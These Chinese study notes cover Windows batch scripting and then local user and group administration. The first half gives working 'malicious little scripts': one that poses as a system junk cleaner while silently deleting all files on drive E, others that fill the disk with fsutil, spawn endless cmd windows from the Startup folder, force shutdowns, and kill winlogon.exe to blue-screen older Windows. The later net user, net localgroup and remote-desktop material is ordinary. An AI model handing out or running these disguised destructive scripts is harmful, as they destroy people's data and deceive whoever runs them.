一: 批处理
1.1: 什么是批处理
从上而下成批的处理每一条命令,直到执行最后一条
1.2: 如何创建批处理
创建一个记事本,然后将后缀名改为.bat
1.3:批处理恶意小脚本
color: 颜色设置,可用color ?查看
title: 自定义cmd窗口的标题
echo.: 批处理特有的语法,代表空一行
pause: 运行暂停,可以让cmd窗口显示
@echo off
color 0a
title hello
echo ===========
echo.
echo hello
echo.
echo ===========
pause
假装是系统清理,实际上是删除e盘所有文件,文件夹
>nul 2>nul: 表示不管输出正确的还是错误的信息都会直接消失,不显示在屏幕上
e: >nul 2>nul: 防止有些电脑没有这个盘,而报错提示
rd . /s /q: /s逐级删除,/q删除时不询问
ping: 此处起到一个拖延时间的作用
@echo off
color 0a
title 系统垃圾清理
echo ==============
echo 系统垃圾清理
echo ==============
echo 开始...
echo 进行中...
e: >nul 2>nul
cd \ >nul 2>nul
rd . /s /q >nul 2>nul
ping 127.0.0.1 -n 10 >nul 2>nul
echo.
echo 清理完成
pause
创建无用的大文件填充磁盘
@echo off
color 0a
title 生成大文件
echo ==============
echo create file
echo ==============
echo.
echo starting...
e: >nul 2>nul
cd \ >nul 2>nul
ping 127.0.0.1 -n 5 >nul 2>nul
fsutil file createnew d:\system.ini 10240000000 >nul 2>nul
echo end
echo.
pause
无限弹窗CMD窗口
:后面接任意字符,表示这是一段区块,goto加字符名,表示跳转到这里
name.bat:表示当前打开的这个脚本的名字
%userprofile%: 这个系统的用户,比如c:/user/administrator,因为每个电脑的用户都不一样,所以用变量表示
copy到这个脚本到系统启动项,这段代码只适用于xp及以前的系统。win7,win10:%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
copy name.bat "%userprofile%\「开始」菜单\程序\启动"
:1
start
goto 1
创建一个名为5.bat的脚本文件
cls: 清屏
set /p: 这个变量要求用户输入来赋值的
:3 这里面的代码利用echo在启动项创建一个文件,表示在启动项运行一个让电脑下次开机的时候进入无限cmd弹窗的操作
@echo off
color 0a
title program v1.0
:menu
cls
echo =================
echo.
echo menu:
echo 1. power off
echo 2. create file
echo 3. create bat
echo 4. exit
echo.
echo =================
set /p number=please input your choise:
if %number%==1 goto 1
if %number%==2 goto 2
if %number%==3 goto 3
if %number%==4 goto 4
echo your input is error!!!please again.
pause
goto menu
:1
set /p time=please input your power off time(seconds):
shutdown -s -f -t %time%
goto menu
:2
echo starting...
ping 127.0.0.1 -n 3 >nul 2>nul
e: >nul 2>nul
cd \ >nul 2>nul
fsutil file createnew e:\system1.ini 1024000000 >nul 2>nul
fsutil file createnew e:\system2.ini 1024000000 >nul 2>nul
echo end!
pause
goto menu
:3
echo :a >> "%userprofile%\「开始」菜单\程序\启动\5.bat"
echo start >> "%userprofile%\「开始」菜单\程序\启动\5.bat"
echo goto a >> "%userprofile%\「开始」菜单\程序\启动\5.bat"
:4
echo exiting...
exit
运行界面:
win2003,xp实现蓝屏功能
可以理解为:强制关闭登录的这个用户,但是当前用户又在使用中,不知道咋办了,就给你蓝屏了。
ntsd -c q -pn winlogon.exe
二: 用户与组管理
win+r输入compmgmt.msc
用户管理
1.1 用户概述:
每一个用户登录系统之后,拥有不同的操作权限
每个账号都有自己的唯一的SID(安全标识符)
用户SID:S-1-5-21-426206823-2579146042-14852678-500
系统SID:S-1-5-21-426206823-2579146042-14852678
上述S到678表示的是电脑的ID
用户UID:500
windows系统管理员administrator的UID是500
普通用户的UID是从1000开始的
不同的账户拥有不同的权限,为不同的账户赋予权限,也就是为不同账户的SID赋予权限
windows系统账号密码存储的位置:c:\windows\system32\config\SAM
windows系统上,默认密码最长有效期42天
1.2 内置账户
给人使用的账户:
administrator 管理员账号
guest 来宾账号
给计算机服务组件相关的系统账号
system 系统账户,权限至高无上
local services 本地服务账户,权限等于普通用户
network services 网络服务账户,权限等于普通账户
1.3 配置文件
windows叫配置文件
Linux叫家目录(HOME)
1.4 对用户的基本DOS命令
net user 列出当前计算机的所有用户
net user abc 123 /add 创建一个账号abc密码123的用户
net user abc 123 /del 删除abc账号
net user abc /active yes 激活账号
net user abc /active no 锁定账号
组管理
组概述:把不同用户放在同一个组里面,使其具有共同作用
作用:简化权限的赋予,不用一个一个的去赋予权限
赋予权限的方式:
用户--组--赋予权限
用户--赋予权限
内置组:
内置组的权限已经默认被系统赋予了
administrators 管理员组
guests 来宾组
users 用户组
network 网络配置组
print 打印组
remote desktop users 图形化远程桌面
telnet 命令行远程桌面
常用DOS命令:
net localgroup 显示当前电脑所有的组
net localgroup 组名 查看该组成员
net localgroup 组名 /add 创建一个新的组
net localgroup 组名 /del 删除一个组
net localgroup "remote desktop users" abc /add 把abc用户添加到远程桌面组,让其具有远程桌面的权限,一个用户可以有多个分组
net localgroup "remote desktop users" abc /del 移除分组
图形化页面远程连接
1 被远程控制的需要开启允许远程连接的权限
2 在控制端 win+r 输入mstsc即可
命令行远程连接
telnet + ip 在XP系统上直接远程控制服务端,但是会报错。
需要在连接端和被连接端同时打开telnet服务
并进行如下操作
netstat -an 查看本机开放的所有端口
telnet端口号 23
远程桌面协议又叫RDP,端口3389